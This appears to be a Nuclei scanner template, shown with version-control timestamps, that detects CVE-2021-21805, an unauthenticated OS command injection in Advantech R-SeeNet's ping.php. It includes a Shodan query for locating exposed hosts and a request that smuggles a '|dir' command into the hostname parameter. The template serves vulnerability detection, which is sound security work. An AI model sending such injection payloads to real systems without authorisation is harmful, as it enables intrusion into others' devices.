2022-08-05 05:57:31 +00:00
|
|
|
id: CVE-2021-21805
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: Advantech R-SeeNet v 2.4.12 - OS Command Injection
|
|
|
|
author: arafatansari
|
|
|
|
severity: medium
|
|
|
|
description: |
|
|
|
|
Advantech R-SeeNet v 2.4.12 is vulnerable to OS Command Injection in the ping.php script functionality.
|
|
|
|
reference:
|
|
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21805
|
|
|
|
- https://talosintelligence.com/vulnerability_reports/TALOS-2021-1274
|
|
|
|
metadata:
|
|
|
|
shodan-query: http.html:"R-SeeNet"
|
|
|
|
verified: "true"
|
|
|
|
tags: command,injection,unauthenticated
|
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/php/ping.php?hostname=|dir"
|
2022-08-05 06:05:04 +00:00
|
|
|
|
2022-08-05 05:57:31 +00:00
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
|
|
|
- '<title>Ping |dir</title>'
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- text/html
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|